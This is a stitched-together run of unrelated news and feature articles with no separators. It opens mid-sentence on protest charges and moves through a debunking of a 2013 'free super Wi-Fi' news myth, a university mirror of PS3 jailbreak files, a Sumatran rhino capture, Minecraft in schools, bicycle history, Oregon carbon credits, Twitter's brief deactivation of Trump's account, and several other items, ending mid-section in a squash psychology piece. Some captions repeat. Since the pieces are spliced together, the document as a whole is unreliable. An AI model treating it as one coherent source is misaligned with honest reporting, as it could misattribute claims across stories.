Levy-Pounds and other organizers face other charges related to the protest, including unlawful assembly. Trespassing charges still stand against protesters arrested by police that day, because the cops used the right words.
Yesterday, a representative from Current TV's Viewpoint show contacted some people at Condé Nast, the owner of Ars Technica. Current TV was preparing a story about "the FCC's proposal to create free Internet access with the creation of 'super Wi-Fi' networks across the country," this person said, and the show needed a tech journalist to talk about it on the air. Uh-oh.
If you read Ars or follow wireless tech, you already know what goes wrong in this anecdote. Yes, this week saw a story become a national sensation—free Wi-Fi for everyone! A virtual Oprah Winfrey would descend from on high and bestow free Internet connections onto us all, eliminating the need for pricey home Internet service and cell phone bills forever.
The frenzy began Monday morning when the Washington Post reported that "the federal government wants to create super Wi-Fi networks across the nation, so powerful and broad in reach that consumers could use them to make calls or surf the Internet without paying a cellphone bill every month." Best of all, network access would be free. "If all goes as planned, free access to the Web would be available in just about every metropolitan area and in many rural areas," the Post reported. The clear implication: this was a bold—and entirely brand-new—plan.
Unfortunately, the piece was basically nonsense. What had really happened was in fact unbelievably boring: the Post simply observed an incremental development in a Notice of Proposed Rulemaking (NPRM) at the Federal Communications Commission over the issue of incentive auctions that might free up some additional unlicensed spectrum for so-called "White Space Devices" (read our explainer) operating in and around the current over-the-air TV bands. (I told you it was boring; in addition, the basic debate over White Space Devices was actually settled in 2008.)
From this thin material, which basically consisted of Internet service providers and tech companies sniping at each other in long legal documents, with no decisions being made by anyone and no new proposals of anything, the Post then reported—on the front page, above the fold of the country's eighth-most highly circulated newspaper—that the FCC plan could lead to free Internet for most US residents.
While the long-running White Spaces debate might improve Internet access in the US, it will absolutely not lead to free Internet for everyone. And yet the idea that FREE WIRELESS INTERNET might soon blanket the country shambles on, zombie-like.
(Not) setting things right
After the Post piece, the story spread like wildfire, repeated in both mainstream media and tech publications. One of my favorite examples said, "The Federal Communications Commission wants to make the Internet as pervasive and free as air" with a nationwide Wi-Fi network "so expansive, fast, and strong that everyone could make VoIP calls and surf the Internet for free."
It got a little better when sensible people joined the fray. Ars took a tough line against the original report, but we were hardly alone. Dan Frommer quickly debunked the myth. So did Paul Waldman of The American Prospect, Karl Bode of DSLReports, and Jerry Brito of the Technology Liberation Front. Sam Gustin of Time later weighed in with a wrap-up of the whole mess, as did TechDirt. Former Wired.com editor-in-chief Evan Hansen and Andrew Sullivan of the noted political blog The Dish also helped spread the word that this was a myth.
Yet three days later, the story lives. The Post wrote a "follow-up" article but never corrected its original account. A number of news sites did make prominent corrections to their original stories; many others didn't bother, and their pieces still link back to the original Post article. The story threatens to keep spreading as PR firms try to promote their client's services with press releases touting the FCC's free Wi-Fi plan (example). Even Friday morning, after the article you're reading right now was published, the Portland Press Herald ran an editorial titled "Our View: FCC plans for free Wi-Fi would spur economy."
And as I noted at the beginning of this article, Current TV was preparing a story that would reiterate the FCC's plan to blanket the country in free Wi-Fi more than 48 hours after the "new" idea had been whacked with the Shovel of Reality.
Since Current TV was looking for a reporter to talk about the great free Wi-Fi on the air, I said I would do it. But when I told them in advance that there is no new free Wi-Fi plan, they killed the segment before we could do an interview. (Hilariously enough, Current TV's own website had already reported Tuesday that "The FCC Really Has No Free Wi-Fi Plan," but I guess the TV producers on staff hadn't seen that.) I don't blame the producers for passing on the story, of course—we do it at Ars all the time when something isn't what it first seemed. But an opportunity to set the record straight was lost.
The end result? The story is still out there. Three days after anyone who knew what they were talking about debunked the free Wi-Fi myth, three days after the Post was notified of its mistake, the false story is still published on the Post website and many other sites as if it were true all along. Here's a sampling of articles (emphasis on sampling) that remain online in more or less their original, incorrect form:
Business Insider: Telecom Corporations Are Trying To Stop The Government From Offering Free 'Super Wi-Fi'
Daily Caller: FCC wants free Wi-Fi for all (This one has a tiny update at the end noting that the "veracity of the original story by The Washington Post is now being disputed by industry experts," with a link to a new story. That's textbook "false balance.")
(This one has a tiny update at the end noting that the "veracity of the original story by The Washington Post is now being disputed by industry experts," with a link to a new story. That's textbook "false balance.") Motherboard: The FCC Wants to Blanket the Country in Free Wi-Fi (Update) (This is another one with an update at the end, which only indirectly suggests the story might not be entirely true).
(This is another one with an update at the end, which only indirectly suggests the story might not be entirely true). SV411: The FCC Pushes Free Wi-Fi for All
ITworld: Will the FCC's free Wi-Fi plan bridge the digital divide?
Orlando Sentinel: FCC considers free, super Wi-Fi
CIO Today: FCC Proposes Free, Powerful Wi-Fi Public Networks
Slashgear: FCC calling for free nationwide Wi-Fi for the public
Reason: FCC Plans National, Government-Run Wi-Fi
Salon: Free Wi-Fi from the government?
ThinkProgress: Four Major Benefits Of The FCC's Public Wi-Fi Proposal
Popular Science: FCC Proposes Free Wi-Fi For Everyone In The U.S.
UPI: FCC proposes free super Wi-Fi service for public
NPR: FCC Proposes Public Wi-Fi Network
The FCC process underlying all these stories is actually quite complicated. A simple way of explaining it is that the Commission is preparing an incentive auction in which TV broadcasters would give up some of their long-held airwaves in the 600MHz band. Some of these airwaves could be sold to private interests, and others could be made "unlicensed," meaning they could be used similarly to today's Wi-Fi services but cover larger geographic areas because of their lower frequencies. This would add some airwaves to the "White Spaces" movement, which uses empty TV broadcast channels to provide Internet access, sometimes for free, sometimes for pay.
Municipalities could use the extra airwaves to provide network services (with your tax dollars), or commercial interests could use them to build out networks—unlicensed spectrum can be used by anyone. But White Spaces has already been around for several years, and there's little reason to expect that any new auction will lead to an explosion in use along the lines predicted by the original Post story. It's not even clear when the auction might be held. The only recent development was the FCC taking comments from tech companies.
A difficult debunking
Among the most troubling questions from this episode is why the Internet's ability to spread information at gigabit speed didn't result in the story being killed.
I became involved in this story in a way I didn't expect. After posting my own debunking Monday night, I tried to spread my story and the stories from fellow debunkers to turn the tide against the inexorable spread of this free Wi-Fi myth. It didn't work.
I ended up talking to the Post reporter on the phone and e-mailing with the Post's ombudsman. The ombudsman told me that the FCC confirmed to the Post that the "free Wi-Fi" story was correct, which is odd, because I also talked to people at the FCC who said the exact opposite. Similarly, a TechCrunch reporter wrote that "my contact at the FCC told me that there was no such plan" as the one reported by the Post.
The Post reporter was genuinely nice and seemed eager to correct the record, but the execution was lacking. She followed up with a more realistic piece on page 14 titled "Five things to know about 'free' public Wi-Fi." It explains some of the realities of the situation, such as the fact that the FCC won't be building any networks itself and that whatever networks are built won't necessarily be used to provide free Internet access.
The Post's follow-up story was all well and good, but the original story was never corrected or retracted. (The followup said the original "sparked a lot of questions from readers," but didn't reveal that it was flat-out wrong.) In addition to getting the front-page treatment, the initial Post story was coupled with a cringe-inducing video titled "FCC offers path to free Internet access." A host begins the spot by asking, "What if Wi-Fi didn't come from a router in your living room but instead from powerful TV antennas? And better yet, what if you didn't have to pay for it? That possibility could become a reality across the US thanks to a new proposal by the Federal Communications Commission." (Have I made it clear that the proposal is not new and never required "free access," either?)
The Post reporter went on NPR Tuesday, spreading the free Wi-Fi myth. After listening to the piece, I contacted NPR to let them know they had it wrong. I never heard back. Just like the Post, NPR didn't correct its first story. And just like the Post again, NPR made things more confusing by writing a follow-up titled "Viral story about free Wi-Fi spotlights mostly hidden policy war." (Money quote: "Basically, there is no new FCC plan that will in the relatively near future lead to an explosion of free Wi-Fi.")
Look, I've been a journalist more than half my life. I spent years writing for newspapers—I know how this works. A journalist gets a story completely wrong and doesn't want to believe it. Instead of correcting the original story, a "follow-up" gets written to give the appearance that no correction is needed—the issue just needs to be explained in further detail. The real purpose is to avoid correcting the record while implying that the original story wasn't wrong.
What should the Post have done to set things right? The best example comes from a Mashable writer named Alex Fitzpatrick. He initially wrote a story repeating the Post's account, titled "Government Wants to Create Free Public 'Super Wi-Fi.'" When he realized his mistake—an honest one that many others made after reading the Post article—he wrote a follow-up titled "The Government Is Not Building a National Wi-Fi Network." The piece ended with the words "Mashable apologizes for any confusion created by our earlier reporting on the subject" and the original piece was updated to say that "The government is not building national Wi-Fi networks. Mashable regrets the error."
It doesn't get any more clear than that. Fitzpatrick called it "a learning experience for a young reporter," an honorable way of saying that when you get it wrong, it's your responsibility to make it right.
If only the country's eighth-largest newspaper followed the same code.
January 11, 2011
GeoHot Mirror
Click here for usage instructions. Clickfor usage instructions.
--Our friends at Sony are having another bad day: i.e., doing something breathtakingly stupid, presumably because they don't know any better. This time they're suing George Hotz for publishing PS3 jailbreak information, as reported by EnGadget and Attack of the Fan Boy. Hotz's jailbreak allows PS3 owners to run the software of their choice on a machine they have legally purchased. His site is geohot.com.We will help our friends at Sony understand this by mirroring the geohot jailbreak files at Carnegie Mellon.No doubt you're eager to rack up another billable hour by sending legal threats to me and my university. Before you go down that unhappy road, check out what happened the last time a large corporation tried to stop the mirroring of technical information here:. Have you learned anything in ten years?Research Professor of Computer ScienceCarnegie Mellon UniversityPittsburgh, PA 15213
Scientists have had the first contact in over four decades with a Sumatran rhino in Kalimantan, the Indonesian part of Borneo. For a long time it was thought the animal was extinct in this region, until three years ago camera traps captured images of the rhino clinging on in the remote rainforest. Now conservationists have managed to safely catch one individual.
With only around 100 Sumatran rhinos estimated to survive in the wild, spread out across massive distances, the future of the species balances on a precipitous edge.
“This is an exciting discovery and a major conservation success,” says Dr. Pak Efransjah, the CEO of WWF-Indonesia, who have been running the project. “We now have proof that a species once thought extinct in Kalimantan still roams the forests, and we will now strengthen our efforts to protect this extraordinary species.” The individual is a female, and is thought to be around 4 or 5 years old. The team caught her using a pit trap in Kutai Barat, where it is thought that around 15 of the animals survive in three populations.
Researchers caught the animal in a specially designed pit trap. © Ari Wibowo / WWF-Indonesia
The Sumatran rhino (Dicerorhinus sumatrensis), also known as the “hairy rhino” due to its covering of fur (especially on the young), is the smallest species of rhino alive today. Once roaming across much of Southeast Asia, from India and China down to Indonesia, they are now restricted to scattered populations, most of which are found on the island of Sumatra. They face serious threats from poachers, but also through habitat loss as the forests they live in are cut down. The wild population of Sumatran rhino in Malaysian Borneo was declared extinct last year.
She is thought to be around 4 years old, and will move to a newly established Sumatran Rhino Sanctuary. © Ari Wibowo / WWF-Indonesia
While a handful of Sumatran rhinos are already in captivity on the island of Sumatra, breeding the animals has been notoriously difficult. This is in part because if female Sumatran rhinos go for long periods of time without mating, they develop cysts in their womb, which eventually means they are no longer able to have calves. It is hoped that by bringing young females in from the wild for a breeding program, they will have had more frequent contact with other males and hopefully won't suffer from this issue.
The overall aim is to translocate at least three of the diminutive rhino from their current habitat to a Sumatran Rhino Sanctuary that will be established about 150 kilometers (93 miles) from the capture site, though the exact location of the center has not been revealed due to the threat of it being targeted. This will be the second such sanctuary in Indonesia after the first one was established in Sumatra in 1984, and will hopefully keep the animals safe from poaching and establish a breeding population in Borneo.
In what seems like every kid's dream, teachers across the world are starting to incorporate Minecraft into their curriculum. The smash-hit game has sold over 70 million copies and is already available on home computers, consoles and mobile devices. However parent company Microsoft, who purchased the game's developer Mojang for $2.5 billion last year, have launched a new education site that aims to integrate Minecraft into the classroom as well.
The site is titled Minecraft in education and looks to bring schools, and especially their teachers, up to speed about the possibilities that Minecraft can offer to students. By making learning far more fun and interactive, the game is said to enhance knowledge and interest in STEM subjects (science, technology, engineering and mathematics), as well as basic problem-solving skills. With the world moving towards such a digital era, STEM fields are likely to be some of the most important skills for young children to learn. That said, even history and mythology can be taught, with the ability to recreate ancient civilizations being a further beneficial factor of Minecraft. The official site proclaims:
“Minecraft in education is a way to teach, learn and inspire. It's students visiting ancient civilizations to create and play out their own stories. It's exploring mathematical concepts like perimeter, area, and volume by breaking and placing Minecraft blocks. It's practising collaboration, problem-solving, digital citizenship, and leadership skills through creative thinking and innovative design. Minecraft in education is teachers and students inspiring each other to change the way we learn.”
In addition to the knowledge and entertainment that Minecraft offers, the game additionally helps to build a sense of teamwork and community. Along with users being able to use their own servers to host co-op Minecraft games with their friends, the gaming phenomenon has held its own convention every year since 2010. The event, MineCon takes place in a different location each time, with last year's convention taking place in London, England.
However, a recent study has been conducted by Cambridge University in the UK that shines light on the amount of screen time teenagers are engaging in nowadays. The study showed that those who spent more hours in front of a computer or T.V, would attain two grades lower in exams than those who had less screen time. Kirsten Corder from Cambridge's Centre for Diet and Activity said, “[The research] is likely to be a reliable snapshot of participants' usual behavior, so we can reasonably suggest that screen time may be damaging to a teenager's grades.”
Minecraft is already being trialed in some schools, but whether added screen time will actually benefit children in their formative years still remains to be seen. Nevertheless, this innovative approach has the potential to impact how people view teaching methods – an effect Microsoft themselves will certainly hope to elicit with their new educational site.
Watch a video that outlines Microsoft's vision for Minecraft in schools.
Foo Fighters star has teamed up with comedian Dana Gould
Dave Grohl is set to executive produce a new sitcom about a rock band in crisis.
The Foo Fighters frontman has teamed up with comedian Dana Gould, who will write and star in the project, being developed by the FX channel, according to Deadline.
The comedy will focus on a band on the verge of megastardom who fall out, and in a last ditch attempt to stay together, seek professional therapy. Unfortunately they end up with a misanthropic couples counsellor who is on the brink of divorce.
Gould, a former writer for The Simpsons, is a fan of Grohl's music and approached him about working on the project. Grohl himself is no stranger to comedy, regularly dressing up in Foo Fighters videos and played Satan in Tenacious D‘s movie The Pick Of Destiny.
However, he has his own dim views about bands in therapy. Speaking to NME last year about his own bands' turbulent history, he said: “I believe one of the reasons we've managed to stay together [is] because we just don't tell each other everything.
“I know that some bands hire therapists to help them sit down and work shit out. That would completely destroy our band. Bands in therapy are doomed. You shouldn't be open emotionally with your band. From the beginning we wanted to make it clear that this was not like the drama club. We did not want any bullshit.”
Illustration: Rob Milton, with apologies to Terry Gilliam
In 1869, an article in the respected US magazine Scientific American declared, ‘The art of walking is obsolete.
‘It is true that a few still cling to that mode of transportation, and are still admired as fossil specimens of an extinct race of pedestrians, but for most of civilised humanity, walking is on its last legs.'
The cause of this sensational prediction? The humble bicycle. A couple of decades earlier on this side of the Atlantic, a newspaper in Glasgow had reported an unusual event in which ‘a gentleman bestride a velocipede of ingenious design' knocked over a five-year-old girl and was fined five shillings.
The velocipede concerned was the first incarnation of the modern bicycle – its ‘ingenious design' being pedals attached to the back wheel by a series of piston-like rods.
The rider ‘bestride' it was its inventor, blacksmith Kirkpatrick Macmillan, who had cycled 70 miles from his home before the incident.
His design, which replaced the previous, pedal-less ‘dandy horse' that was propelled by the rider pushing themselves along the ground with their feet, was the first stage of the bicycle's evolution into the featherweight, computer-designed carbon fibre machines of today.
Macmillan's daring ride along rutted cart tracks, in an age of horse-drawn vehicles and an embryonic rail network, was as groundbreaking at the time as the first email being sent 150 years later.
Suddenly it was possible for ordinary folk to travel long distances under their own steam. It opened up a whole new world of opportunities for travel, work, pleasure and even romance.
Steady progress
Over time, modifications were made to the ‘ingenious design', such as replacing the wooden frame with a steel one and the addition of John Boyd Dunlop's air-filled pneumatic tyres.
The bicycle also became increasingly affordable and popular with the masses. As Scientific American put it, ‘A horse costs more, and will eat, kick and die; and you cannot stable him under your bed.'
Among this newly emancipated band of bicyclists was the science fiction writer HG Wells, who is credited with the quote: ‘When I see an adult on a bicycle I do not despair for the future of the human race.'
Some of the developments since could have come straight from the pages of one of his novels. Although frames have retained their classic diamond shape for more than a century, they have become more aerodynamic, lighter and stronger thanks to technology borrowed from rocket science, F1 and yacht racing.
But all the technology in the world can't overshadow the bicycle's most enduring feature – its ability to offer escape.
‘It's an adventure machine,' says Matthew Ball, youth coach with West Lothian Clarion CC. ‘That's how we get kids interested in cycling – by selling the adventure it offers.'
Taste of freedom
All riders can identify with that sentiment. We associate the bicycles of our childhoods with our very first taste of freedom and independence, of escaping the shackles of parental authority, even if it did only last as long as the journey to the park and back.
Recalling the bike he was given for his ninth birthday, author Paul Fournel writes, ‘Mountains, plains, bushes, trees, streams, ditches and eternal snow were hidden in my green bike – it took only some riding to learn.'
As a teenager in Liverpool, my bike (also green) led me to the great unknowns of North Wales and Cheshire. Later, I strapped a tent and panniers to its frame and caught a ferry across the Channel.
I saw the world – or at least the European and North African bits of it – from my bike. It has never looked quite as big or exciting from a car or train.
As an adult doing voluntary work in Guyana, my Chinese-built, sit-up-and-beg ‘Roadster' wasn't just for work, but also an accomplice in my romances.
If I asked a girl on a date, she would be expected to perch sideways on the rear rack.
It's a testament to both the girls and the era we lived in that they all acquiesced, though I suspect Sophie, a British student with Operation Raleigh, may have been put off bicycles for life when we careered into an open sewer during a sudden power cut one night.
The inscription at the cyclists' shrine of the church of the Madonna del Ghisallo in Italy reads: ‘And God created the bicycle, so that man could use it as a means for work and to help him navigate life's complicated journey…'
It's easy to forget in our motor-obsessed age that bicycles were once the most popular choice of utilitarian transport.
Years before road cycling became the new rock and roll, it was simply a way of getting from A to B for millions – ‘the poor man's spaceship', as Italian journalist Gianni Brera called it.
British engineer Mike Burrows once said that, unlike a football or racquet, the bicycle ‘is the one piece of sports equipment that can save the planet'.
It's already doing this in the coffee plantations of Rwanda, where farmers harvest crops riding bicycles specially designed for them by US framebuilder Tom Ritchey.
In other developing parts of the world, tens of thousands of affordable bikes have been provided by World Bicycle Relief for use by farmers and schoolchildren in rural communities.
So while walking may not be quite obsolete, Scientific American was almost right: the bicycle really did go on to change the world.
Oregon's program to reduce carbon emissions from cars, trucks and buses could soon provide a financial boost to light rail, street cars and even electric bus programs in two of the state's largest cities.
Officials are considering allowing fuel producers to meet the state's low-carbon fuel mandate by pumping money into electricity-driven transit systems -- even if those systems don't add lines or expand service.
The Department of Environmental Quality plans to consider new rules this fall that could award carbon reduction credits to new -- and perhaps existing -- light rail, street car and electric bus programs. The Portland metro area and Eugene are the only communities with existing transit systems that could qualify for the potential perk.
California, which already allows electric transit systems to earn credits in its low-carbon fuels program, awards the carbon offsets to both new and existing systems, California Air Resources Board spokesman Dave Clegern said Friday.
The Oregon transit districts could turn around and sell those credits to the companies that import gas and diesel into Oregon. Those firms are required by the state's low-carbon fuels law to lower the carbon intensity of fuels by 10 percent over a decade by blending in biofuels or purchasing the carbon offset credits. Carbon intensity refers to all emissions associated with a fuel, from extraction or generation and transport, through consumption.
Money from the sales of carbon credits could help the transit districts replace some of the millions of dollars they raised during the last decade through state energy tax credit programs that ended in the 2015 tax year, although it's not clear how much money the carbon credits might generate. The tax credits issued by the Oregon Department of Energy were available to transit agencies to cover ongoing operations costs, not just service expansions or new investments.
The Department of Energy issued $7.3 million in various energy tax credits to TriMet since 2009, according to state data obtained by The Oregonian/OregonLive. Since TriMet is a government agency and does not owe taxes, it sold the credits for a reported total of $5.4 million to businesses and individuals who wanted to lower their tax bills. During the same time period, the state issued $1.9 million worth of energy tax credits to Lane Transit District, which sold the credits for $1.4 million.
If the Department of Environmental Quality allows owners of existing light rail and other electric-powered transit and equipment to rack up carbon credits, it could further transform Oregon's low-carbon fuels standard from an effort to achieve new carbon emissions reductions to a program that subsidizes existing alternative fuels infrastructure and transit operations. The program already allows owners of existing alternative fueling systems such as electric car charging stations to generate credits as if they are creating new reductions in the state's carbon emissions.
Mary Fetsch, a spokeswoman for TriMet, said the agency would be interested in participating if the Department of Environmental Quality allows light rail, street cars and electric buses to generate credits in the low-carbon fuels program. TriMet just received a $3.4 million federal grant to purchase four battery-powered electric buses this summer.
Fetsch said the state should allow transit districts to earn carbon reduction credits for their existing electric trains and buses, but she was unable to explain how that would meet goal of the low-carbon fuels program to reduce carbon intensity in fuels by 10 percent over a decade.
"If you count current transit service which delivers on reducing carbon generation and emissions, that would recognize that we are already contributing," Fetsch said.
Cory-Ann Wind, an air quality manager for the Department of Environmental Quality who works on implementation of the low-carbon fuels program, said it's possible for existing electric street cars, light rail and car charging stations to count towards the 10 percent reduction in carbon emissions because that goal was based on the assumption that none of those alternative transportation options existed at the start of the program.
Instead, the Department of Environmental Quality calculated the 2015 baseline for the program based on the idea that Oregon's transportation systems -- from cars to buses -- were all running on gasoline or diesel.
Wind said she hopes to hold the first meeting to consider the program expansion, which could also open up credit generation to truck stop electrification, electric forklifts and refrigeration units, in September or October. That rulemaking process will also cover additional measures to contain the cost of the low-carbon fuel standard, such as following California's lead to create a carbon credit clearance market.
Under a credit clearance system, fuel importers who are unable to purchase the carbon credits they need to comply with state law at the end of the year could ask the Department of Environmental Quality to help them find and purchase credits. If the state located entities holding credits, they would be required to sell the credits at a maximum price set in state law. This would allow the state to cap the cost of the program to consumers, Wind said.
As the state's largest transit district, TriMet likely has the most to gain from a potential expansion of which entities can generate low-carbon fuels credits. It is also the transit agency most closely involved in the concept.
Although Wind said the idea to include electric transit systems stemmed from California's 2015 decision to make a similar change in its program, TriMet was also in talks with the Department of Environmental Quality about the idea since at least last year, said Dan Bower, executive director of Portland Streetcar, Inc. Bower learned of the concept when a TriMet employee suggested he contact the Department of Environmental Quality for more information.
Bower did not know enough about the carbon credit concept to say whether it would make sense for Portland Streetcar Inc. to participate, but he said the system already provides environmental benefits.
"Our electrified system is proving a much cleaner solution for 15,000 trips a day than the automobile," Bower said.
Meanwhile, Lane Transit District's government relations manager Edward McGlone said the agency hadn't been informed the Department of Environmental Quality was considering the idea. "We haven't been in touch with DEQ about it," McGlone said. "We would be interested in the opportunity, but we haven't looked at it yet." The district already purchased five electric buses it expects to arrive this fall and plans to order an additional five buses soon, with most of the cost for both purchases covered by federal grants.
-- Hillary Borrud
@hillaryborrud
The former Twitter contractor who shut off President Donald Trump's account for 11 minutes on his last day at work earlier this month insisted on Wednesday that it was an accident.
Bahtiyar Duysak, a German national of Turkish origin who was employed in Twitter's San Francisco headquarters on a temporary work visa, came forward as the man who briefly silenced the president.
While many anti-Trump forces hailed Duysak as a hero for muting the volatile American president and his favorite mode of communication, he claims there was nothing intentional.
‘It was definitely a mistake,' he told TechCrunch. ‘If I'm involved in this I really apologize if I hurt anyone. I didn't do anything on purpose.
'I didn't do any crime or anything evil, but I feel like Pablo Escobar,' he added
Duysak says that on his last day at the company, somebody submitted a complaint against Trump for violating Twitter's guidelines that ban users from incendiary comments.
Bahtiyar Duysak, a German national of Turkish origin who was employed in Twitter's San Francisco headquarters on a temporary work visa, came forward as the man who silenced the world's most important social media page
The former Twitter contractor who shut off President Donald Trump's account (above) for 11 minutes on his last day at work earlier this month insisted on Wednesday that it was an accident
For a few minutes, visitors to Donald Trump's Twitter were greeted with this error message shortly after 7pm on November 2
Twitter explained two hours later that it was one of its own employees that caused the outage and followed up their initial tweet explaining it was an employee on their last day
He worked at Twitter's Trust and Safety division, where he handled customer support.
Duysak told TechCrunch that after Trump's account was flagged, he performed functions on his computer that ended up causing the account to be deactivated - although he did not specify.
He said that he realized after the fact - when he got home and turned on the news - that he may have inadvertently shut off the president's Twitter.
'I had a wild time in America,' he said.
While many anti-Trump forces hailed Duysak as a hero for muting the volatile American president and his favorite mode of communication, he claims there was nothing intentional
‘If I'm involved in this I really apologize if I hurt anyone. I didn't do anything on purpose,' he told TechCrunch
Duysak says that on his last day at the company, somebody submitted a complaint against Trump for violating Twitter's guidelines that ban users from incendiary comments
'I was tired sometimes, and everyone can do mistakes. So it might be that I did a mistake.'
Duysak said that Trump's Twitter account was deactivated due to 'a number of coincidences – very little probabilities which randomly occurred on my last day of work.'
'I didn't hack anyone, I didn't do anything that I wasn't authorized to do,' he said.
'I didn't go to any site or tool where I wasn't supposed to be at. I didn't do any crime and I underline that I complied with all rules.'
Duysak said that he is unhappy about the notoriety he has gained since November 2.
He said that since his last day at Twitter, he has been hounded by the press.
Reporters have also contacted his friends, who cut ties to Duysak in response.
'I just want to continue ordinary life. I don't want to flee from the media,' he said.
'I want to speak to my neighbors. I want to speak to my friends.
'I had to delete hundreds of friends [from social media] because reporters are stalking me. I had to delete so many pictures and I just want to continue ordinary life.'
When asked about people's reactions calling him a hero, he said: '[The Nobel Peace Prize] should be accepted by the one who deserves it. I don't deserve to be nominated for the Nobel Peace Prize.'
The suspected sabotage took place shortly before 7pm on November 2, when social media reports surfaced that the president's personal account @realdonaldtrump was unavailable, providing the error message that the user 'does not exist.'
After a brief investigation Twitter owned up and took responsibility for the outage.
In a tweeted statement, the company said Trump's account was 'inadvertently deactivated due to human error' by one of its employees.
'We are continuing to investigate and are taking steps to prevent this from happening again,' the statement continued.
But in a second statement, Twitter confirmed it was an employee on their last day.
'Through our investigation we have learned that this was done by a Twitter customer support employee who did this on the employee's last day. We are conducting a full internal review.'
Memes and gifs quickly sprung up praising the employees mischievous act on their last day
Twitter users with their unique brand of humor were quick to praise the now former worker
Just before 7pm EDT, visitors to the 45th President's Twitter profile were greeted with both a frustrating and confusing message: 'Sorry, that page doesn't exist! You can search Twitter using the search box below or return to the homepage.'
Twitter users were confused as to what could have caused the brief account shutdown with some correctly speculating it was deleted by Twitter and others wondering if the President did it himself. Others simply rejoiced:
'Donald Trump doesn't exist according to Twitter,' wrote one, 'I was there for the great vanishing of Donald Trump's Twitter account,' chimed another.
'Feel like I need to re-evaluate my life choices after reflecting on my reaction to Trump's Twitter,' joked one correspondant.
'The greatest trick Donald Trump's Twitter account ever pulled was making us all hope that it didn't exist' tweeted one.
A short time later, the account page reappeared and seemed to be functioning as normal. His government account remained active throughout.
Duysak said that Trump's Twitter account was deactivated due to 'a number of coincidences – very little probabilities which randomly occurred on my last day of work'
When asked about people's reactions calling him a hero, he said: '[The Nobel Peace Prize] should be accepted by the one who deserves it. I don't deserve to be nominated for the Nobel Peace Prize'
About half an hour earlier, Mr Trump had tweeted a video about his nomination of Jerome Powell to be the next chairman of the Federal Reserve.
Hundreds of Twitter users posted witty comments and memes on the social network enjoying the brief respite from the President's feed.
'@RealDonaldTrump finally became president... for those brief few minutes when his personal Twitter account was down,' joked one user.
'We'll all remember where we were during the 10 minutes of peace while Donald Trump's Twitter account was down,' said another.
'If Trump's Twitter account did in fact get deleted, that would be the first bit of good news we've gotten in a while,' another quipped.
The President's account, which has almost 42 million followers has proved to be a vital tool in the way Mr Trump communicates to the outside work, it being the main channel of communication he uses to disseminate statements and attack his critics.
Johannesburg - Two police officers burnt to death after an alleged drunk driver crashed into their official vehicle in Roodepoort, Gauteng police said on Wednesday.
Lieutenant Colonel Lungelo Dlamini said Elias Thabo Dibete, 34, Constable Thulasizwe Skhahla, 38, and Constable Lesiba Chris Thubakgale, 34, were in the car on Ontdekkers Road at around 01:00 on Tuesday when the accident happened.
"After the accident, a police vehicle, a Mazda sedan, caught fire and two members [Dibete and Skhahla] burned beyond recognition," he said.
"A third member [Thubakgale]... was thrown out the vehicle and was assisted by a tow-truck driver and he was airlifted to the hospital in a serious condition. The members were on duty and on routine patrol when the accident occurred."
The driver of the other car is expected to appear in the Roodepoort Magistrate's Court on Wednesday on charges of drunken driving and culpable homicide.
National police commissioner General Riah Phiyega visited the trio's station and spoke to the officers on duty.
"She also visited the next-of-kin of the deceased members and promised them they will receive the necessary help from the service in order to bury their loved ones with the dignity they deserve," Dlamini said.
The officers' station commander Brigadier Thandiswa Kupiso said police management were shocked by the accident.
"[It] has robbed the community of Roodepoort of members who have been delivering services to their best ability," Kupiso said.
According to the official WikiLeaks Twitter account, “[Vice President Joe] Biden says [Julian] Assange is a ‘terrorist' and Mubarak is ‘no dictator'–and should not step down. Biden is a dangerous fool.” Then followed an overnight flood of tweets calling attention to fresh leaks about Egypt's brutal regime.
One of those messages said, “Help us spread the last two days of cables into Egypt through neighboring media and sat tv.”
The Egyptian government has shut down almost all channels of communication, including Internet and SMS service, in response to civil unrest.
One new cable details a meeting between Sen. Joseph Lieberman and Gamal Mubarak, son of the Egyptian president. Another discusses the fate of Yemeni children reportedly brought to Egypt for organ harvesting. A 2009 cable from Ambassador Margaret Scobey says, “Torture and police brutality in Egypt are endemic and widespread.” — PZS
Airbus is looking to put its flying taxi in the air next year, confirmed CityAirbus chief engineer Marius Bebesel this week. The schedule is on track after CityAirbus conducted successful ground tests of the electric power system it's using to propel the vehicle through the air.
The CityAirbus craft is a vertical take-off and landing craft that uses a four rotor design, and that would be able to take up to four passengers on short flights in dense urban areas, with the aim of connecting major transportation hubs including train stations and airports. It's designed to be pilot operated at launch, but to eventually transition to being a fully autonomous vehicle once the tech catches up.
CNBC reports that Airbus is aiming to operate the craft along fixed, predetermined routes, with top air speeds of around 80 mph. They'll be able to skip over the traffic that can dramatically increase travel times entering and exiting busy city transit points, which would theoretically also help alleviate ground congestion.
Short hop flights are also an ideal application of battery electric tech, since that's all that vehicles will be able to manage using fully electric power sources in the near-term. Plus, battery unit swapping or autonomous dock charging could help make it easier to make these vehicles fully self-flying in the future.
Rationalising irrational thoughts…. It affects everyone.
I'd wager everyone who has ever played sport has experienced a limiting belief at some stage at least once. Limiting beliefs can affect people of all ages, ability and experiences and even those who might seem to be confident.
They can afflict people at any time but they tend to come mainly just before, during or in between matches. They tend to be expressions of doubt in an area of the game but this is not always the case. They sometimes are the result of a perceived failure, which means they can often affect the minds of very strong players more.
Examples of limiting beliefs or actions:
The Perfectionist: ‘I have to hit every shot exactly where I want it to go. If one shot I hit doesn't do exactly what I intended, I'm not playing well enough.'
But if Ramy Ashour can't do it every time, can you seriously expect to do it every time?
The Perfectionist limiting belief is one that slips under the radar. These limiting beliefs can be the result of internal and external causes, although in the end they are all of course reactions created by our minds. Frequently, the perfectionist limiting belief is internal but it can also come from external pressures and too much expectation.
The Perfectionist Limiting Belief often effects strong players whose perfectionism has driven them very far as they constantly look for ways to improve their game and tend to practice a lot to satisfy their own inner voice.
The line at the top of this section about hitting every shot where I wanted it to go was the sort of inner monologue that afflicted me constantly throughout my years as a junior player and held me back in a number of ways. Being a perfectionist in training and indeed in wider life can be a great thing but only if you can avoid letting it taking over during performance.
I went into court believing I should hit every shot well. Every shot that I hit should feel good, look good and land precisely where I intended it. If one shot refused to bow to the omnipotent power of my inner mind, the game was up and I was a failure. I wasn't even a particularly strong junior. I flirted on the edges of the County Squad and beat many of those at the lower end of the order and played my fair share of tournaments but I was certainly never a real prospect. Yet I believed I should be producing masterpieces every time I stepped onto the court.
This is not an uncommon trait. There are many out there who set themselves incredibly high standards and begin to become agitated the moment it starts to deviate even slightly away from those standards.
Rationalising these irrational limiting beliefs
